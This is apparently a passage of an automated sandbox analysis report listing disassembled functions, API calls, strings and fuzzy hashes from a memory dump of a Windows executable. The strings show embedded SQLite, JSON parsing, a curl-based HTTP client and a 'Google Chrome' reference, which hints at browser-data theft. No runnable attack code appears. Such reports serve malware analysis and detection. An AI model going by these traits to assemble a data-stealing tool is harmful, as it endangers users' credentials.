memmove.VCRUNTIME140(0000000F,00000000,00000000,00000000,unexpected ,0000000C,00546470,syntax error ,0000000D,3A5313C3,?,?), ref: 0042E6E2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000), ref: 0042E64D

Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,7FFFFFFF,00000000,?,00000000), ref: 004056B1
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,?,00000000,7FFFFFFF,00000000,?,00000000), ref: 004056C2

Part of subcall function 00405740: memmove.VCRUNTIME140(00000000,00000001,00000000,?,00000000), ref: 004057F9

Part of subcall function 004055E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00000000), ref: 00405705
Part of subcall function 004055E0: memmove.VCRUNTIME140(00000000,?,00000000,?,00000000), ref: 0040570D
Part of subcall function 004055E0: memmove.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,00000000,?,00000000), ref: 00405719

memmove.VCRUNTIME140(0000000F,00000000,00000000), ref: 0042E5B2

Part of subcall function 0042DAF0: memmove.VCRUNTIME140(00000000,00000001,00000002,00000000,3A5313C3,?), ref: 0042DBCC

Part of subcall function 00427FB0: memmove.VCRUNTIME140(?,00000001,00000002,3A5313C3,?,00000000,?,0042A221,[json.exception.,00000010,3A5313C3,3A5313C3), ref: 00427FEC

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,unexpected ,0000000C,00546470,syntax error ,0000000D,3A5313C3,?,?), ref: 0042E72B

Part of subcall function 004055E0: Concurrency::cancel_current_task.LIBCPMT ref: 00405739

memmove.VCRUNTIME140(0000000F,00000000,00000000,00000000,; expected ,0000000C,00000000,00000000,00000000,00000000,00000000,unexpected ,0000000C,00546470,syntax error ,0000000D), ref: 0042E7DC
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000000,00000000,00000000,; expected ,0000000C,00000000,00000000,00000000,00000000,00000000,unexpected ,0000000C,00546470,syntax error ), ref: 0042E821

Strings

syntax error , xrefs: 0042E35D
; expected , xrefs: 0042E795
while parsing , xrefs: 0042E3BB
; last read: ', xrefs: 0042E563
unexpected , xrefs: 0042E69B

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 2488677081-4239264347
Opcode ID: cf25d6154cd4ee32c97648f9a7dcc7cf55a48dd558092b7900cb97679668f488
Instruction ID: 22b91d4301c07d15641423ed93accfe828e1c807a9750bf3ce7b9fc7c1f1301e
Opcode Fuzzy Hash: cf25d6154cd4ee32c97648f9a7dcc7cf55a48dd558092b7900cb97679668f488
Instruction Fuzzy Hash: C6021371A001199FDB08DFA8D984BEEBBB5FF49304F64012DE401B7382D779A985CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004443E0 Relevance: 24.9, APIs: 6, Strings: 8, Instructions: 419COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004446FF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00444741
__allrem.LIBCMT ref: 0044474C
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0044482A
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00444889
__allrem.LIBCMT ref: 00444894

Strings

%lld, xrefs: 00444839
%02d, xrefs: 004445FB, 00444739
%04d, xrefs: 004448CB
%.16g, xrefs: 004447D3
string or blob too big, xrefs: 00444970
%06.3f, xrefs: 00444652
W, xrefs: 0044470C
%03d, xrefs: 00444788

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem
String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W$string or blob too big
API String ID: 632788072-3927112599
Opcode ID: abed9b2ace6a39423b228b117ac030486f894a19306ec148a3d9df8f2aaf7825
Instruction ID: ca4fa89ccf4ed6704febc938ebb9f64808b1af47d41097a4612bd190ad1792c1
Opcode Fuzzy Hash: abed9b2ace6a39423b228b117ac030486f894a19306ec148a3d9df8f2aaf7825
Instruction Fuzzy Hash: AAF1E2719087809BE7118F28C801B6BBBE5BFC5308F040A5EF9D4A7392D779D946CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0042E010 Relevance: 21.2, APIs: 14, Instructions: 196COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000098,3A5313C3), ref: 0042E060

Part of subcall function 0042D760: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(3A5313C3), ref: 0042D79C
Part of subcall function 0042D760: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(?,00000000,00000000), ref: 0042D7BA
Part of subcall function 0042D760: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140 ref: 0042D7E4

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 0042E07A
?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,00000000), ref: 0042E099
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP140(?), ref: 0042E0C3
?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001), ref: 0042E0CF
?imbue@?$basic_ios@DU?$char_traits@D@std@@@std@@QAE?AVlocale@2@ABV32@@Z.MSVCP140(?,?), ref: 0042E101
?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000030), ref: 0042E176
?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000002,00000000), ref: 0042E193
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP140(?), ref: 0042E1D5
?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEDD@Z.MSVCP140(00000030), ref: 0042E202
?setw@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000002,00000000), ref: 0042E219
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G@Z.MSVCP140(?), ref: 0042E25B
??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?), ref: 0042E2AB
??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 0042E2B4

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??6?$basic_ostream@V01@$?imbue@?$basic_ios@?setw@std@@?widen@?$basic_ios@J@1@_Smanip@_U?$_V32@@Vlocale@2@$??0?$basic_ios@??0?$basic_ostream@??0?$basic_streambuf@??1?$basic_ios@??1?$basic_ostream@?classic@locale@std@@D@std@@@1@_Init@locale@std@@Locimp@12@_V12@V?$basic_streambuf@memset
String ID:
API String ID: 1983193968-0
Opcode ID: 8b0e377514435a9307ab4f53e3e89f266b6d989b0b731497dd01c5de6cbede3c
Instruction ID: 3156e6579c4ad63adfbd682b5af23f34c28d179d10a0f55a97aee9fc8b205f31
Opcode Fuzzy Hash: 8b0e377514435a9307ab4f53e3e89f266b6d989b0b731497dd01c5de6cbede3c
Instruction Fuzzy Hash: 38912930B01218AFCF54CB68DC54B99BBB5AF19304F0484E9E54EAB351DB35AE89CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00464000 Relevance: 19.8, APIs: 1, Strings: 12, Instructions: 287COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?,nil,?), ref: 004640E9

Strings

%lld, xrefs: 00464184
NULL, xrefs: 00464208
nil, xrefs: 00464087, 004640E4
%.16g, xrefs: 004641C8
k(%d, xrefs: 0046402F
intarray, xrefs: 00464251
%s(%d), xrefs: 00464163
BINA, xrefs: 004640A8
program, xrefs: 0046426A
(blob), xrefs: 00464221
(%.20s), xrefs: 00464140
vtab:%p:%p, xrefs: 00464238

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: %.16g$%lld$%s(%d)$(%.20s)$(blob)$BINA$NULL$intarray$k(%d$nil$program$vtab:%p:%p
API String ID: 2162964266-1384894641
Opcode ID: e34f6fec1670e8f7ea15d6366c97981e8820440e3fb956a8ce9a43454252f070
Instruction ID: 3c44ea0bc263f5ac0e3d3775daf3b6f06fd1b07f22208a9212a1ab58f0cd3c21
Opcode Fuzzy Hash: e34f6fec1670e8f7ea15d6366c97981e8820440e3fb956a8ce9a43454252f070
Instruction Fuzzy Hash: 7281E972B052045FDB109E9DAC85BBABB94FBC5319F1401FFFA08CB342E6668C1583A5

Uniqueness

Uniqueness Score: -1.00%

Function 0046A350 Relevance: 18.3, APIs: 2, Strings: 10, Instructions: 308COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(?), ref: 0046A446
memmove.VCRUNTIME140(?,?,00000000), ref: 0046A4D6

Strings

%lld, xrefs: 0046A58F
d, xrefs: 0046A3A8
%02x, xrefs: 0046A6ED
NULL, xrefs: 0046A557
zeroblob(%d), xrefs: 0046A68B
`$, xrefs: 0046A65B
'%.*q', xrefs: 0046A640
-- , xrefs: 0046A3EE, 0046A401
%!.15g, xrefs: 0046A5B8
NULL, xrefs: 0046A575

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: %!.15g$%02x$%lld$'%.*q'$-- $NULL$NULL$`$$d$zeroblob(%d)
API String ID: 2162964266-425311666
Opcode ID: 4184d56a6d865a98ff9698f541a313cc75aaf94597ff4d6a95bdb7cbac43cf44
Instruction ID: d738569e13cb1e58a245d545a87df913fcb2969027bd0a342f166ea326dbbe5c
Opcode Fuzzy Hash: 4184d56a6d865a98ff9698f541a313cc75aaf94597ff4d6a95bdb7cbac43cf44
Instruction Fuzzy Hash: 5FC1DEB05087419BD714CF18C841A6ABBF1BF95308F14092EF886A7352EB79E856CF4B

Uniqueness

Uniqueness Score: -1.00%

Function 0042F160 Relevance: 17.9, APIs: 6, Strings: 4, Instructions: 422COMMON

Download Yara Rule

Strings

invalid number; expected '+', '-', or digit after exponent, xrefs: 0042F67A
invalid number; expected digit after '-', xrefs: 0042F76E
invalid number; expected digit after exponent sign, xrefs: 0042F5C2
invalid number; expected digit after '.', xrefs: 0042F4FE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$_invalid_parameter_noinfo_noreturn
String ID: invalid number; expected '+', '-', or digit after exponent$invalid number; expected digit after '-'$invalid number; expected digit after '.'$invalid number; expected digit after exponent sign
API String ID: 2580228974-1962259348
Opcode ID: c22fefa777772c54c3b6c5c128ce344ea62a175831b37c549a7c69a0a8490883
Instruction ID: 447e2cf9a12a89c176a31ddd571a3ee171bac07f0c941a3329b39349a643441a
Opcode Fuzzy Hash: c22fefa777772c54c3b6c5c128ce344ea62a175831b37c549a7c69a0a8490883
Instruction Fuzzy Hash: 5502FF74604651DFCB25CF28D480A6AFBF1FF1A304F940ABED44197752C339A949CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 004D6360 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 121COMMON

Download Yara Rule

APIs

calloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000E68,?,004C9958,00000000), ref: 004D6368
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 004D639A

Strings

<, xrefs: 004D653B
`, xrefs: 004D6582
v, xrefs: 004D6596
<, xrefs: 004D6459
<, xrefs: 004D6531

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: callocfree
String ID: <$<$<$`$v
API String ID: 306872129-2056843887
Opcode ID: 7b32674afdce9a0b4088a6bf265f3e8e43a5187466f0dc8865b3f8fca750ce99
Instruction ID: bc9618dad434b139748cd522a834e47b495a9c67c469a7a460abc2ce69009e02
Opcode Fuzzy Hash: 7b32674afdce9a0b4088a6bf265f3e8e43a5187466f0dc8865b3f8fca750ce99
Instruction Fuzzy Hash: BF61D9B05057818EEB11DF18C8D87C63BA5BB51328F1842B9DDA85F2DBC7BA1058CBB5

Uniqueness

Uniqueness Score: -1.00%

Function 0047F000 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 291COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,?,?), ref: 0047F244

Strings

Cannot add a column with non-constant default, xrefs: 0047F1DE
sqlite_temp_master, xrefs: 0047F2A5
Cannot add a NOT NULL column with default value NULL, xrefs: 0047F179
sqlite_master, xrefs: 0047F2AA, 0047F2B2
UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q, xrefs: 0047F2B7
Cannot add a UNIQUE column, xrefs: 0047F11C
Cannot add a REFERENCES column with non-NULL default value, xrefs: 0047F14F
Cannot add a PRIMARY KEY column, xrefs: 0047F0F2

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q$sqlite_master$sqlite_temp_master
API String ID: 2162964266-2453307425
Opcode ID: d3dab72a8e9b33d789bfcb80c6deb498c36aeed506cd260024888d202e14ffd6
Instruction ID: 6ef43ddd7249c1686d3d328d7d42bc72b1fd6446af0fdb3b6ea653121cdf3731
Opcode Fuzzy Hash: d3dab72a8e9b33d789bfcb80c6deb498c36aeed506cd260024888d202e14ffd6
Instruction Fuzzy Hash: CCA1AE706042018BDB14EF25D892BABB7E5BF88308F44496EF84987352EA35DD498B96

Uniqueness

Uniqueness Score: -1.00%

Function 004032E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 004032E0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Empty hostname.,00000023,3A5313C3), ref: 0040304C
Part of subcall function 004032E0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000002), ref: 00403081
Part of subcall function 004032E0: ?_Xbad_function_call@std@@YAXXZ.MSVCP140([HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.,0000004F), ref: 004030C7

Part of subcall function 00404C60: memmove.VCRUNTIME140(Google Chrome,?,?), ref: 00404C8D

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 004033A6
?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 00403464
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00403496

Strings

Expect:, xrefs: 0040335B
[HTTPClient][Error] Empty hostname., xrefs: 0040301F
[HTTPClient][Error] Unable to perform request from '%s' (Error = %d | %s) (HTTP_Status = %ld), xrefs: 00403427
[HTTPClient][Error] Curl session is not initialized ! Use InitSession() before., xrefs: 0040309F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Xbad_function_call@std@@_invalid_parameter_noinfo_noreturn$memmove
String ID: Expect:$[HTTPClient][Error] Curl session is not initialized ! Use InitSession() before.$[HTTPClient][Error] Empty hostname.$[HTTPClient][Error] Unable to perform request from '%s' (Error = %d | %s) (HTTP_Status = %ld)
API String ID: 2540137445-1075970874
Opcode ID: acf8c86d11393891f63e114836b9611d711b788a30b084ad28aed8ce5db83a2b
Instruction ID: 426aad2b6873b86f6bfd11db9ccab74890884faf695191bf5e547a5547f79ea0
Opcode Fuzzy Hash: acf8c86d11393891f63e114836b9611d711b788a30b084ad28aed8ce5db83a2b
Instruction Fuzzy Hash: 84510571A002049FDB14DF68DD89BAEBBB9EF45315F10412AF901A73D1DB3A9A048B64

Uniqueness

Uniqueness Score: -1.00%

Function 004343E0 Relevance: 12.2, APIs: 8, Instructions: 150COMMON

Download Yara Rule

APIs

memmove.VCRUNTIME140(00000000,7FFFFFFF,?,?,00000000), ref: 004344BA
memmove.VCRUNTIME140(?,?,?,00000000,7FFFFFFF,?,?,00000000), ref: 004344C8
memmove.VCRUNTIME140(?,?,?,?,?,?,00000000,7FFFFFFF,?,?,00000000), ref: 004344D9
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000), ref: 00434516
memmove.VCRUNTIME140(00000000,?,?,?,00000000), ref: 0043451E
memmove.VCRUNTIME140(7FFFFFFF,?,?,00000000,?,?,?,00000000), ref: 0043452A
memmove.VCRUNTIME140(?,?,?,7FFFFFFF,?,?,00000000,?,?,?,00000000), ref: 0043453B

Part of subcall function 0052040F: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00405356,00000038,?,?,811C9DC5,3A5313C3,?,?), ref: 00520424

Concurrency::cancel_current_task.LIBCPMT ref: 00434555

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmove$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
String ID:
API String ID: 2075926362-0
Opcode ID: 5827d71d10ad08f2a1de011bbf091f7ddb27a62d6725acccc370364c29ec0f37
Instruction ID: 07b00e8a3623eba7abd2bd783dcc58f1b496e9c4a22a33a02093117545549b3a
Opcode Fuzzy Hash: 5827d71d10ad08f2a1de011bbf091f7ddb27a62d6725acccc370364c29ec0f37
Instruction Fuzzy Hash: EB41F272A00129ABCF09EF68DC415AEBBB5FF99350B14027AF815E7351E630AD218B95

Uniqueness

Uniqueness Score: -1.00%

Function 004C4340 Relevance: 12.1, APIs: 8, Instructions: 67COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,004C4615,?), ref: 004C4358
_invalid_parameter_noinfo.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,004C4615,?), ref: 004C4364

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _errno_invalid_parameter_noinfo
String ID:
API String ID: 2959964966-0
Opcode ID: bd50a602cf09de2895838d67fc90b1589783a16a97dafc2bb0a17f375e3f774f
Instruction ID: ea3752651dcb098e2eb625c1076f11eca04903484b57e668020b45e166a52807
Opcode Fuzzy Hash: bd50a602cf09de2895838d67fc90b1589783a16a97dafc2bb0a17f375e3f774f
Instruction Fuzzy Hash: 88015E773012149BEB602B9EFD49B9AB758EFE5375F00002BF908C6320DA7648449665

Uniqueness

Uniqueness Score: -1.00%

Function 004A73F0 Relevance: 10.8, APIs: 2, Strings: 5, Instructions: 316COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,0000004C), ref: 004A7507
memmove.VCRUNTIME140(00000000,?,?), ref: 004A7557

Strings

circular reference: %s, xrefs: 004A7686
table %s has %d values for %d columns, xrefs: 004A76E1
multiple recursive references: %s, xrefs: 004A7726
multiple references to recursive table: %s, xrefs: 004A7676
recursive reference in a subquery: %s, xrefs: 004A772F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID: circular reference: %s$multiple recursive references: %s$multiple references to recursive table: %s$recursive reference in a subquery: %s$table %s has %d values for %d columns
API String ID: 1288253900-1006964112
Opcode ID: d0d2e6c294de578ab44d4466eb53ad12e1298c3391fc89ece22c886b3005bbd6
Instruction ID: 2ffb8ac56b6471f49ab4f745115fdb8e0df2e92e0820b010228880705663c1e4
Opcode Fuzzy Hash: d0d2e6c294de578ab44d4466eb53ad12e1298c3391fc89ece22c886b3005bbd6
Instruction Fuzzy Hash: D4C1D475A046058FCB24CF69D8407AAFBF1FF9A314F1841AAD8589B341D739ED42CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0047F360 Relevance: 10.8, APIs: 4, Strings: 3, Instructions: 286COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,0000004C), ref: 0047F47F
memset.VCRUNTIME140(00000000,00000000,?), ref: 0047F4D6
memmove.VCRUNTIME140(?,?,?), ref: 0047F51E
memmove.VCRUNTIME140(00000000,?,?), ref: 0047F581

Strings

virtual tables may not be altered, xrefs: 0047F3D7
sqlite_altertab_%s, xrefs: 0047F4E9
Cannot add a column to a view, xrefs: 0047F3FC

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: memmovememset
String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
API String ID: 1288253900-2063813899
Opcode ID: 34faa2085899773e45146a8b567703b702dbedaef5e4715604e3c3c4fafad5f9
Instruction ID: 7cd9bce285925b71d5cef8c33f8b83cf4fb139c234d878aed48d2a9261778382
Opcode Fuzzy Hash: 34faa2085899773e45146a8b567703b702dbedaef5e4715604e3c3c4fafad5f9
Instruction Fuzzy Hash: 47A1B170A006159BCB14DF69C881BAEB7F1FF88304F14856EE809EB351D739ED068B98

Uniqueness

Uniqueness Score: -1.00%

Function 004041F0 Relevance: 10.7, APIs: 7, Instructions: 203COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0040427F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: fgetc
String ID:
API String ID: 2807381905-0
Opcode ID: 8b2afb63a3a23fd7780507570119681549d478ac5b7b71583b48484a712dc132
Instruction ID: 49ee9db90307065f22f8fcf5e0ec4565beebad5f871e4b0f568ca3a4419ac334
Opcode Fuzzy Hash: 8b2afb63a3a23fd7780507570119681549d478ac5b7b71583b48484a712dc132
Instruction Fuzzy Hash: 7181A4B1E00119CFCF15CFA8C884AAEBBB5FF89310F10826AE911B7295D735A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 004C70D0 Relevance: 10.7, APIs: 7, Instructions: 186COMMON

Download Yara Rule

APIs

?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@XZ.MSVCP140(3A5313C3), ref: 004C719A
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?,3A5313C3), ref: 004C71F9
?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP140(?,?,00000000,3A5313C3), ref: 004C722C
?sputc@?$basic_streambuf@_WU?$char_traits@_W@std@@@std@@QAEG_W@Z.MSVCP140(?), ref: 004C7259
?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000004,00000000), ref: 004C72C2
?uncaught_exception@std@@YA_NXZ.MSVCP140 ref: 004C72CF
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140 ref: 004C72DE

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@U?$char_traits@$?sputc@?$basic_streambuf@_U?$char_traits@_W@std@@@std@@$?flush@?$basic_ostream@?setstate@?$basic_ios@?sputn@?$basic_streambuf@?uncaught_exception@std@@Osfx@?$basic_ostream@V12@
String ID:
API String ID: 790894551-0
Opcode ID: 5efdc1f692b98e0186bd30651f3d6e2669e791cbae695db3aac1ec73b6eb8065
Instruction ID: fe86730586f1ce9bb2425ba8366eafecbb79d9355dbca1732b0926b031220fa8
Opcode Fuzzy Hash: 5efdc1f692b98e0186bd30651f3d6e2669e791cbae695db3aac1ec73b6eb8065
Instruction Fuzzy Hash: 98716C79A086108FCB54CF58C994F6AB7B1FF48314F19829EE8069B3A1DB38AC45CF55

Uniqueness

Uniqueness Score: -1.00%

Function 004023E0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184COMMON

Download Yara Rule

APIs

toupper.API-MS-WIN-CRT-STRING-L1-1-0(?,?,3A5313C3), ref: 00402456
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,https://,https://,https://,?,?), ref: 004025A5

Strings

HTTPS://, xrefs: 004024B5
http://, xrefs: 004024FC
HTTP://, xrefs: 00402489
https://, xrefs: 004024F7, 00402535, 00402536, 00402537

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturntoupper
String ID: HTTP://$HTTPS://$http://$https://
API String ID: 2753071247-3336074766
Opcode ID: 2376335f48943da3e0f8d3f02b7847e0a4961c58746be9ce92d03f23ab120af5
Instruction ID: 85752ff1449f204227c5a05df774bc2c8ebcd770f029fd27d8ce7db4ab0ade05
Opcode Fuzzy Hash: 2376335f48943da3e0f8d3f02b7847e0a4961c58746be9ce92d03f23ab120af5
Instruction Fuzzy Hash: F1510771E00105AFDF04DFA8DD88AAEB7B6EB89304F50413AE811B72C1D778AD458B94

Uniqueness

Uniqueness Score: -1.00%

Function 00426120 Relevance: 10.6, APIs: 7, Instructions: 132COMMON

Download Yara Rule

APIs

?_Init@locale@std@@CAPAV_Locimp@12@_N@Z.MSVCP140(00000001,3A5313C3), ref: 00426177
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 0042618F
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 004261A8
??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 004261CC
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 00426234
std::_Facet_Register.LIBCPMT ref: 00426275
Concurrency::cancel_current_task.LIBCPMT ref: 0042628F

Memory Dump Source

Source File: 00000007.00000002.2703014683.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_16E6.jbxd

Yara matches

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getgloballocale@locale@std@@Init@locale@std@@Locimp@12@Locimp@12@_Registerstd::_
String ID:
API String ID: 540129085-0
Opcode ID: e6ebcf4223aaf173c2257cfe80e3d39e1a6afb173887f2854d82768b817cacda
Instruction ID: 7c973ea2bc6183dd2e713d0307ecf138acaee48df69237d21f1635007da4a5fc
Opcode Fuzzy Hash: e6ebcf4223aaf173c2257cfe80e3d39e1a6afb173887f2854d82768b817cacda
Instruction Fuzzy Hash: DE41AFB5E00224CFDB14DFA4E8446AEBBB4FF18714F15816EE805A7352CB38AD05CBA5

Uniqueness

Uniqueness Score: -1.00%

